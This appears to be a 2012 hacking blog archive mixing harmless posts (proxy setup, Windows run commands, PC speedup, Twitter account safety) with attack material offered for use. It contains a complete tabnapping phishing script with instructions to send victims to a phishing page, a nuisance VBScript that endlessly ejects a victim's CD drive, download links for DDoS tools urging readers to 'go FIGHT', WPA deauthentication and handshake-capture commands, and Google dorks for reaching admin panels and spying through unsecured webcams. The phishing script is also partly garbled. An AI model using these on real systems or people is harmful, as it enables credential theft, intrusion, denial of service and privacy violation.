Friday, 28 December 2012

The Five Stages of Ethical Hacking



Phases of hacking 

Phase 1—Reconnaissance
Phase 2—Scanning
Phase 3—Gaining Access 
Phase 4—Maintaining Access 
Phase 5—Covering Tracks

Phase 1: Passive and Active Reconnaissance
Passive reconnaissance involves gathering information regarding a potential target without
the targeted individual’s or company’s knowledge. Passive reconnaissance can be as simple as
watching a building to identify what time employees enter the building and when they leave.
However, it’s usually done using Internet searches or by Googling an individual or company
to gain information. This process is generally called information gatheringSocial engineering and dumpster diving are also considered passive information-gathering methods.
 
Sniffing the network is another means of passive reconnaissance and can yield useful information
such as IP address ranges, naming conventions, hidden servers or networks, and other
available services on the system or network. Sniffing network traffic is similar to building
monitoring: A hacker watches the flow of data to see what time certain transactions take place
and where the traffic is going.

Active reconnaissance involves probing the network to discover individual hosts, IP addresses,
and services on the network. This usually involves more risk of detection than passive reconnaissance
and is sometimes called rattling the doorknobs. Active reconnaissance can give a hacker an
indication of security measures in place (is the front door locked?), but the process also increases
the chance of being caught or at least raising suspicion.

Both passive and active reconnaissance can lead to the discovery of useful information to
use in an attack. For example, it’s usually easy to find the type of web server and the operating
system (OS) version number that a company is using. This information may enable a hacker
to find a vulnerability in that OS version and exploit the vulnerability to gain more access.
 
Phase 2: Scanning
Scanning
involves taking the information discovered during reconnaissance and using it to
examine the network. Tools that a hacker may employ during the scanning phase can include
dialers, port scanners, network mappers, sweepers, and vulnerability scanners. Hackers are
seeking any information that can help them perpetrate attack such as computer names, IP
addresses, and user accounts.

Phase 3: Gaining Access 
This is the phase where the real hacking takes place. Vulnerabilities discovered during the reconnaissance and scanning phase are now exploited to gain access. The method of connection the hacker uses for an exploit can be a local area network (LAN, either wired or wireless), local access to a PC, the Internet, or offline. Examples include stack-based buffer overflows, denial of service (DoS), and session hijacking. These topics will be discussed in later chapters. Gaining access is known in the hacker world as owning the system.

Phase 4: Maintaining Access
Once a hacker has gained access, they want to keep that access for future exploitation and
attacks. Sometimes, hackers harden the system from other hackers or security personnel by
securing their exclusive access with backdoors, rootkits, and Trojans. Once the hacker owns
the system, they can use it as a base to launch additional attacks. In this case, the owned system
is sometimes referred to as a zombie system.
 
Phase 5: Covering Tracks
Once hackers have been able to gain and maintain access, they cover their tracks to avoid
detection by security personnel, to continue to use the owned system, to remove evidence of
hacking, or to avoid legal action. Hackers try to remove all traces of the attack, such as log files
or intrusion detection system (IDS) alarms. Examples of activities during this phase of the
attack include steganography, the use of tunneling protocols, and altering log files.

Friday, 21 December 2012

Wanna eject your enemy's CD- ROM drive continusely here's the code


(Educational Purpose Only) 

Set oWMP = CreateObject

("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then For i
= 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next End If
wscript.sleep 5000
loop STEPS:
1. Copy and paste this code in
notepad.
2. Save it anything.vbs EG.
Eject.vbs
3. If you wanna stop it go to task
manager>processes it
shows something like wscript
jus end that process. Thank You

Thursday, 29 November 2012

THE TRUTH OF PROXY AND ANONYMOUS INTERNET SURFING



1) What is a proxy?
A proxy is an address of a proxy server (look @ kind of proxy's) that is placed between your computer and the internet :

Normal :
Computer --------> Internet
With proxy :
Computer ---------> Proxy server -----------> Internet

The main advantage of the Proxy is that it will cover up your IP address (your identity on net) which may help you in opening the ban sites in your country. It was very much popular in days when Facebook was banned in Pakistan and user use Proxies to log into their accounts.



2) Kind of Proxies:

You have 2 different proxy's (some more but these are for a normal internet users) :
-1: Private proxies : They are only for you (it's the same like buy your own ip address ) and will cost 15-20$
-2: Public Proxies : They are for everyone but the problem is sometimes you can get fast proxy's and sometimes slow ones. If you have a good site/list with fast proxy's there as good as private proxy's


3) Where get your proxy ?
There are many ways to find the proxies but some address are also expired , so just search Google for the Fresh Sites. (search : free Proxy, free anonymous surfing)

4) Use proxy with IE(Internet Explorer):
-1: Open Internet explorer
-2: Go to tools > Internet Options > Connections
-3: Now you will see “LAN Settings” open it
-4: Check Use a Proxy server for LAN. Than you will be able to use Address and Port.
-5: Get a proxy (Read Wear get your proxy's) and fill the address you don't have to fill it the port.
-6: Hit ok , ok and it's done. You surf now with a proxy !


5) How safe is it ?
The use of proxy's is legal and it's a good protection BUT don't think ur full protected/undetected. It's more and more popular and some (protected) site block public proxy's because of the spammers …
6) Proxy software
You have lots of software that work with proxies like a Anonymous Surfing, bruteforcer or proxy port scanner.I have even added an link to download 16 various anonymous IP tools from (http://rapidshare.com/files/242280367/IP_Anonymous_Surfing_Tool_16in1_.rar) 


7) WARNING!!!!
It is true that a proxy hide your identity but don’t think that you are really safe if you hack CIA Database because in case of hack the Proxy site will give your real identity and you will end up in jail for at least 20 years. So be responsible!!!

Sunday, 25 November 2012

Uniscan On Backtrack ---->>>


HackerS>
>>----
web-vulnerability scanner on Backtrack
how to use it ----
1>root@bt:~# cd /pentest/web/
uniscan/
2>root@bt:/pentest/web/uniscan# ./
uniscan.pl
3>root@bt:/pentest/web/uniscan# ./
uniscan.pl

4>root@bt:/pentest/web/uniscan# ./
uniscan.pl -u http://www.site.com/
-qweds
total usages ---
[1] perl ./uniscan.pl -u http://
www.example.com/
-qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i
"ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -u https://
www.example.com/
-r
OPTIONS:
-h help
-u <url> example: https://
www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search

Best 5 Websitesto Downloads Ur Laptop Drivers....!!!




Day to day Laptop manufacture companies are introducing latest technologies with every new release. As a result of this latest laptops doesn’t comes with “Driver CD”, Mostly particular laptop drivers will be copied in hard disk. Sometimes you may have lost your laptop drivers because of virus attacks or any other reasons.

So if you want to format your laptop, what you will do to install drivers?
Don’t worry friends, today i’ll give you best 5 websites to download drivers for your laptop.
If you have formatted your laptop, you can download the latest version of drivers for your laptop from below mentioned websites.
www.laptopdrivers.net 
You can download all your drivers from this site.www.driverzone.com 
This is another best site to get all your notebook drivers. Almost it has more than 100,000 files. Specially you can download the drivers for even 10 year old laptops.
Note : First two websites are best sites to download all your laptop drivers.

You can access all these programs by going through START-->RUN or Simply Click Windows Key+R


EXCLUSIVE*** 


SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every B
oot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
System Properties - sysdm.cpl
Task Manager – taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Windows Address Book - wab
Windows Address Book Import Utility - wabmig
Windows Backup Utility (if installed)- ntbackup
Windows Explorer - explorer
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera connected)- wiaacmgr
Windows System Security Tool – syskey
Windows Update Launches - wupdmgr
Windows Version (to show which version of windows)- winver
Windows XP Tour Wizard - tourstart
Wordpad - write
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Pinball Game - pinball
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
Malicious Software Removal Tool - mrt
Microsoft Access (if installed) - access.cpl
Microsoft Chat - winchat
Microsoft Excel (if installed) - excel
Microsoft Frontpage (if installed)- frontpg
Microsoft Movie Maker - moviemk
Microsoft Paint - mspaint
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed)- nero
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
IP Configuration (Display Connection Configuration) - ipconfi/all
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff.....
Accessibility Controls - access.cpl
Accessibility Wizard - accwiz
Add Hardware - Wizardhdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools control - admintools
Adobe Acrobat (if installed) - acrobat
Adobe Designer (if installed)- acrodist
Adobe Distiller (if installed)- acrodist
Adobe ImageReady (if installed)- imageready
Adobe Photoshop (if installed)- photoshop
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard – fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Control Panel - control
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
Files and Settings Transfer Tool- migwiz
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Firefox (if installed)- firefox
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Help and Support- helpctr
HyperTerminal- hypertrm
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Connection Wizard- icwconn1
Internet Explorer- iexplore
Internet Setup Wizard- inetwiz
Internet Properties- inetcpl.cpl

Saturday, 24 November 2012

Run Commands


compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit - System Edit
win.ini - windows loading information(also system.ini)
winver - Shows current version of windows
mailto: - Opens default email client
cmd -  Opens command prompt

Friday, 23 November 2012

Anonymous Releases Their Own Operating System, Complete with Hacking Tools, and You Should Not Download It


In a very strange move, some members of hacker group Anonymous have released their own distribution of the Linux operating system, complete with hacker tools for "testing the security of web sites".
The OS is based off Ubuntu and runs the MATE user interface. It comes complete with many built-in hacking tools that crack passwords, search for vulnerabilities in web sites, and simulate denial of service attacks. The about page notes that it was created "for educational purposes" and that you shouldn't use it to attack any web sites, because you could "end up in jail".
Is this an interesting piece of news? Oh yes. Do we recommend you download it? Probably not. Not only could it get you into a host of trouble if used without care, but taking part in Anonymous' activities has been rather dangerous of late—what with some people slipping trojans into Anonymous' own software
Update: The AnonOps Twitter account claims the OS is fake and full of Trojans, so our dis-recommendations stands.

Thursday, 22 November 2012

Twitter Again Resets Thousands Of Hijacked Accounts



If you’ve ever logged into Twitter, but didn’t check the URL to see if it really said Twitter.com in it, you may have logged into a fake site which stole your password. Which can make you very confused and angry!

Urgent UPDATE FROM TWITTER 
If Twitter has detected that you have sent links to a fake Twitter site that steals passwords, they assume you have been hijacked. So many people have recently had their passwords stolen thatTwitter is AGAIN resetting passwords on many accounts. Read on to learn more:
https://twitter.com/safety/status/128951993728372737








What Can I Do If Twitter Doesn’t Reset My Password? 
 If you see tweets or DMs going out that you didn’t create, or if someone tells you that you make be sending hijacked messages, change your password and revoke any apps that you don’t need or don’t recognize (you’ll need to be logged into Twitter.com to see this page  https://twitter.com/login?redirect_after_login=%2Fsettings%2Fapplications ).







How Does This Happen? 
Once your account has its password stolen, it is commonly used to send messages to your followers with links to fake sites.
Messages sent from hijacked accounts include dozens of variations, such as
“Someone is saying really nasty stuff about you here”
“Automated DM, You are tweeting too much”
“Read this, it says really bad stuff about you”
“Saw a real bad blog about you”
“Lol! Is this you in this pic?”
If you’ve ever clicked on a link from one of these messages, you will have found yourself at a fake Twitter login page. If you didn’t wonder “why am I being asked to login?” or look carefully at the URL, and went ahead and logged in, your password was stolen
How Can We Prevent This In The Future? 
Twitter deactivates bad URLs in links as soon as it realizes they are bad. Unfortunately, the bad guys keep changing the links.
One of the best ways to stop this is to let anyone know who sends you a link like this that they have been hijacked, and direct them to this blog post or to http://bit.ly/accountamiss. We need to help one another!

It’s important to teach people that spam-like messages might NOT be from spammers, but from innocent accounts that had their passwords hijacked. So when you see such a message, you may want to let the person know they’ve been hijacked.




How Else Can My Account Be Compromised? 
 Fake Emails “From Twitter”
First, if you think you’ve gotten an email that appears to be from Twitter.com but looks suspicious, forward it to spoof@Twitter.com. You’re helping catch and stop the spammers.
Never open an attachment or install any software from an email that claims to be from Twitter; it’s FAKE. Also, Twitter will never email you, direct message you, or @reply you asking for your password.









Friends Or Employees
If you’ve ever left your computer unattended, or had someone who accessed your Twitter account via an app, they could compromise your account.
Apps can remain connected to Twitter even after you change your password.
So if you are firing anyone who accesses your account via an app, you may need to do more than change your password. 
Passwords Stolen From Other Sites
Whenever a website is hacked such that the hacker get user passwords, they often then try them on major sites such as Twitter, Gmail, Yahoo, Facebook, and so forth.
You can protect yourself by adding one letter to your password to make it unique for every site you use. For example, if your password is 123!_@Abc, simply make it 123!_@AbcT for Twitter, 123!_@AbcF for Facebook, etc.

Wednesday, 21 November 2012

How To Make You Computer Fresh And Fast Forever



In this Article We will explain some simple methods to make your computer cleaner and run faster for long period of time. It’s so frustrating to see our computer slowed down after a period of time. So in this article you will get some methods or you can say ways to make your computer run faster.

Follow the methods listed below:-

Remove Useless software and apps : We often install many unnecessary application and later forget to uninstall them These application becomes burden in our computer and eventually slow down our computers So at first you need to delete all this unnecessary application and software To uninstall the software you should go to Control Panel->Add or remove->find and select the software you would like to uninstall.

Utilize your RAM performance : A lot of you may have these setting already set. But If you don’t have then don’t worry. You just have to follow the process. Right click on My computer->Properties->Advanced system settings->Setting(Under Performance)->Advanced->Change(Under Virtual Memory). Now double the number in Maximum size then the number initial size. It will surely help your PC to utilize the most of RAM.

Check for errors : Our computers face errors very oftenly in daily use and some errors stuck to our computer hard disk which makes our computer slow. So its very important to kill those errors to make our computer work better. Go to My computer and press enter .Our main hard disk is usually C: and we need this drive to be free from error So right click on Hard disk C and then click tools Then from the Error-Checking option click You may need to restart the computer to do so It will make your computer Faster.

Desktop-cleaning : We often keep unnecessary file in our desktop but it actually affects the performance of our computer. Delete the useless files or another choice is to move them to Local disk if necessary. You should only keep shortcuts in your Desktop only if you needed. If we keep Wallpapers on our desktop it also effect slightly to slow down our computer a blank screen is always better remove temporary internet files and cache from your web browser Browsing internet slow down our computer You need to clean these temporary files and cookies to make your computer stay clean and faster. There are a no. of software available today in the market which can do the task for you. You can use Ccleaner for this purpose which is a very trusted software. To proceed to the official website to download Click here ==> http://download.cnet.com/CCleaner/3000-18512_4-10315544.html

Disk Defragmentation : We should defragment our disk to make our PC faster. For deframentation process, just follow the same steps given below. Locate Hard disk C then click properties then click tools and then click defragment Now from the option Disk defragmentation.

Use a Trusted antivirus : he last but not the least tip is to use a reliable trusted antivirus which will protect your PC from harmful antivirus. Kaspersky and AVG are some of the trusted antivirus but you have to pay to use them. If you don’t wish to pay some money then you can also download free Microsoft security essential to save your computer from harmful Malware and spywares download ==>
http://windows.microsoft.com/en-US/windows/security-essentials-download

Hacking sites using noscript deface that site. simple ?




Hello guys, here its a new trick to bypass a login page to enter into the admin panel.

U just need a noscript addon from moZilla and install it in moZilla browser.

and now search on google like this.

intitle:"admin page" inurl:/admin/ intext:Edit simply copy paste this code on google and see u wil got more site with admin page ..... waaaaaaaa..

I know u people r thinking, Why ? this noscript needed. It is needed because Some login pages uses java script to avoid entering into admin page without confirmation. Thats why u need this.

agar aap logo ko acchaa laga toh pls Comment here. If i was wrong in some then correct it.

have a good day.

ADVANCE PHISHING (TABNAPPING)







Make a web page and use the tab napping script in that page say it page A. This script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in script.

check script for this line...



timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);



this line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script so change in both lines.



so, page A with tab napping script will redirect to phishing page B.



Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.



Hacking internet and computer tips and tricks



<script type="text/javascript">

var xScroll, yScroll, timerPoll, timerRedirect, timerClock;



function initRedirect(){

if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz

xScroll = document.body.scrollLeft;

yScroll = document.body.scrollTop;



clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect



timerPoll = setInterval("pollActivity()",1?); //poll scrolling

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect





}

else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead

xScroll = window.pageXOffset;

yScroll = window.pageYOffset;



clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect



timerPoll = setInterval("pollActivity()",1?); //poll scrolling

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect





}

//else do nothing

}



function pollActivity(){

if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scroll?Left || yScroll!=document.body.scrollT?op)) //IE/NS7/Moz

||

(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset)))? { //other browsers

initRedirect(); //reset polling scroll position

}

}



document.onmousemove=initRedir?ect;

document.onclick=initRedirect;

document.onkeydown=initRedirec?t;

window.onload=initRedirect;

window.onresize=initRedirect;

</script>


Note:You have to copy a source code and paste it into two seperate notepadd++ tab
the first one for the tabnapping, so you will put the script here so that it will redirect to the second one which is actually your phishing page...

8 Must-have Features in Your Web Security Solution







Internet access is a remarkable tool that empowers users in ways nothing else can, but free and open Internet access sometimes comes with a price too high to pay, so companies implement web security solutions to mitigate the risks and protect their data. If you are considering web security software to protect your business, make sure the solution you choose has these eight features:





1. Category blocking
There are millions of websites out there, and the best web security solutions offer category blocking to help enforce your Acceptable Use Policy by allowing you to limit web access to specific types of websites.
2. Reputation filtering
New websites appear every day; many are there simply to exploit unwary users. Reputation filtering blocks access to suspect domains, address ranges, and other systems that might not be categorized yet but that do present a risk to your security.
3. Malware scanning and file blocking
The best web security solutions scan every web page and file download, and can also prevent users from downloading file types you don’t want them to access online.
4. Block phishing sites
Even the savviest web Internet users can fall victim to phishing attacks. Look for web security software than can block access to phishing sites to protect your users from themselves, and keep your business from becoming a news story.
5. HTTPS inspection
Stronger web security solutions can even inspect HTTPS traffic, so there’s nowhere for malware to hide.
6. Safe search enforcement
Good web security can enforce safe search, just in case your users forget to use that.
7. Bandwidth restrictions
Streaming media can provide great information to your users. It can also suck up all of your bandwidth, impacting email, your company website, and more. Look for web security solutions that can rate limit streaming media so that users can access information they need, but not at the expense of mission critical apps.
8. Logging and reporting
Knowledge is power, and the ability to check logs, recreate events, and run scheduled or on-demand reports is critical to knowing what’s going on with your users and your network. Don’t settle on this count. Make sure your web security solution has robust reporting and useful logging.
There are a lot of different web security solutions out there. If you choose a solution that doesn’t offer all of these eight features, you will be settling for less than you should. Include these features in your “must have” checklist when you evaluate a solution and you’ll be on the right track to protect your systems and network.
This guest post was written by Casper Manes on behalf of GFI Software Ltd. GFI is the provider for web security solution, GFI WebMonitor ==> http://landwebmonnet.gfi.com/web-security-sm/?adv=13536&loc=1

All product and company names herein may be trademarks of their respective owners

Tuesday, 20 November 2012

Anonymous Weapons


Hi guys Cødê Hįjǟçkêr /PyThOn_kID  is sharing anonymous tools and they r really cool i too sometime use them :)


Downloads
Anonymity
TOR project  https://www.torproject.org/

Virtual Private Network (VPN) I'm not suggesting free as these as are unreliable as they hand IP addresses over.There are many paid for VPN services offered at decent prices.

Do Not Track Plus stops tracking companies  http://www.abine.com/dntdetail.php

No Script for Firefox  https://addons.mozilla.org/en-US/firefox/addon/noscript/

No Script add on for Chrome  https://chrome.google.com/webstore/search/script%20no


Denial of Service tools
LOIC (Low Orbit Ionic Cannon) DDoS tool http://www.mediafire.com/?3xdlm74sw79fnmu (Not suggested)

 HOIC (High Orbit Ionic Cannon) DDoS tool   http://www.mediafire.com/?47cdoua93a4ica7
Pyloris  DoS http://sourceforge.net/projects/pyloris/

Slowloris http://ha.ckers.org/slowloris/

Tor's Hammer http://packetstormsecurity.org/files/98831/

Tors-Hammer-Slow-POST-Denial-Of-Service-Testing-Tool.htmlEgyptian Anonymous DDoS toolkit http://www.mediafire.com/?0jre45981c9eyt4

Anon guns https://rapidshare.com/files/1746996499/anonguns__1_.rar

Bangledshi attack kit http://www.mediafire.com/?liuzayl3bendyuy

Care packages

EarthQuakeInABox  http://anonsource.org/page.php?14

More care packages  http://remainanonymous.org/get-involved/

Pirate tools

Bittorrent<--- I like better lol than Utorrent http://www.bittorrent.com/

To get torrents go to http://thepiratebay.se/ or http://malaysiabay.org:6081/
its a mirror. Sweden hardly ever hands out IP addresses.

If you live in England or any site where TPB is banned download this http://filesmelt.com/dl/Unblock_Piratebay_v2.exe .

Also you can get onto most sites with the TOR PROJECT.

Sony property made by a anon  --> http://pastehtml.com/view/bllpf04jv.html

Reliable torrent site http://www.yify-torrents.com/

You have all the tools. You need. Now go FIGHT. :)

NOTE:  i will soon share some more real cool stuff ;)

Prank your friends by opening and closing his CD-ROM




Hi friends! this may really harass your friends.
It is a virus which will open and close CD-ROM continuously

.Open notepad type the following code and save it as funnyvirus.vbs 

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

So how to stop it,

Go to task manager by pressing Ctrl+Alt+Delete 

or by typing taskmgr in run. 


Go to Processes tab, look for wscript.exe and End Process.

BACKTRACK TERMINAL COMMANDS


BACKTRACK TERMINAL COMMANDS
####################################
####################################




PROGRAMS
Vlc = Video/Music
Flash Plugin = BT5 Forums
Feh = Picture Viewer
Easytether = Android Tethering
Bless = Hex Editor
Gparted = HDD partition Editor
Transmission = Torrent Client
Crunch = Passwordlist generator
###############
###############
#################### ##
FIXES
NO STARTX
rm -rf /root/.kde/cache-bt
rm -rf /root/.kde/cache-root
FIREFOX FLASH PLAYER "FILES
NEEDED"
tar xvfz flashplayer10_2
_p3_64bit_linux_111710.tar.gz
chown root:root libflashplayer.so
chmod 0644 libflashplayer.so
cp -f libflashplayer.so /usr/lib/
mozilla/plugins/
rm -rf libflashplayer.so
ln -s /usr/lib/mozilla/plugins/
libflashplayer.so /usr/lib/firefox/
plugins/
tar xvfz install_flash_p
layer_10_linux.tar.gz
mkdir ~/.mozilla/plugins
mv -f libflashplayer.so ~/.mozilla/
plugins/
VLC RUN AS ROOT FIX
/usr/bin/vlc
edit with hex editor
change the line
geteuid._libc_start_main
to
getppid._libc_start_main
###############
###############
#################### ##
Commands = Action **** = your
input
root:toor
startx = GUI
alsamixer = Volume Control
cd = change working directory
reboot = reboot
poweroff = shutdown
rfkill list = wifi problems
rfkill unblock all = wifi on
rm /***/** = delete file
rm -rf /****/** = harsh delete
iwconfig = wireless config/list
ifconfig = wired config/list
###############
###############
#################### ##
TASKKILLER
kill **** = PID number
###############
###############
#################### ##
BLUETOOTH
hciconfig hci0 up = on
hciconfig hci0 = info
hcitool scan hci0 = find devices
###############
###############
#################### ##
ANDROID TETHERING
easytether connect
***new konsole
dhclient eaytether0
###############
###############
#################### ##
TAR/RAR/ZIP = cd to directory
tar zxf file.tar.gz
tar xvfz ******.tar.gz
tar -zxvf ******.tgz
tar xvf *******.tar.gz2
tar jxf file.tar.bz2
tar zxvf file.tgz
unzip ******.zip
unrar x ****.rar
###############
###############
#################### ##
INSTALL PROGRAMS
aptitude install **** =install
apt-get **** = install
apt-get update = update repos
apt-get remove [--purge] **** =
uninstall plue dependencies
apt-cache search = search repos
###############
###############
#################### ##
BLUETOOTH
start device
>> hciconfig hci0 up
find device info
>> hciconfig hci0
###############
###############
#################### ##
WPACRACKING
rfkill unblock all = start wifi
airmon-ng start wlan0 = start
monitor mode
airdump-ng mon0 = monitor all
airdump-ng -c *channel --
*****bssid -w psk mon0 = catch
handshake
aireplay-ng -0 5 -a****acsespoint -
c ***conectdcomp mon0 = deauth
attack
mdk3 = stronger deauth attack


WinBubbles Lite 2009 (Window Customization ) Free Download




WinBubbles Lite 2009, Access Windows 7 (and Vista) Customizations easily
                                  
This is a small, light-weight, fast, updatable and Open For All version of WinBubbles
 Downlod Link==> http://www.softpedia.com/get/PORTABLE-SOFTWARE/System/System-Enhancements/WinBubbles-Lite.shtml.

In just few clicks, WinBubbles-Lite will let you access the most important Customization functions of Windows 7 (and Vista) easily.




                 The powerful utility includes a built-in Graphical User Interface designer and programmer called RegDevelop that will let you update the program the way that you want. Add Features that is needed.

                
Any part on the program can be updated, Not just for the Programmers But For All.

Branding your new Vista and Windows 7 Machine

Add or Change Original Manufacturers logo and information
Separately Customize the Performance Information and Tools Logo
Change or Customize the Background of Windows 7 Welcome Screen
Change the Owner Information
Add Message before logon
Customize Bubbles Screen Saver - Change to small/Medium size, Metallic Bubbles, remove the shadow and launch in a Black Background
Add “Move To” and “Copy To” Right-Click Menu
Opened with Notepad” Context/Right-Click Menu
Hide this file” and “Hide this Folder” Right-Click Menu – Standard and Run as Admin is included
No Folder Option (Logoff is needed in Windows 7)
Disable Regedit
Disable CMD.exe
Disable Windows Task Manager
Disable Changing of Wallpaper
Disable Control Panel
Disable USB Drive in Windows 7 (Reboot is needed) and Vista
Disable Control Panel
Enter Username before login
Changing UAC levels launcher and *Change the settings to “Prompt for credentials”

How to Gain Access | Hack to Unprotected Webcams Using Google





Hi every one Today I am going to show you how to access unsecured live webcam using Google dorks. There are many Google dorks using that you can easily access live webcam. I will share some of the Google dorks with you   .. Basically some of the Live webcams are there in US and Other Countries using the Google We can easily hack into the webcam and watch lively.. :)
How To Do It:
1. Open Google.com.

2. In that text box Search this 
inurl:/view.index.shtml
1. Now open any result on that page you can see the list of the live webcam simply click it to watch..:)
Some More Google Dorks:
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh

Hope You will enjoy...

Happy Hacking.. :)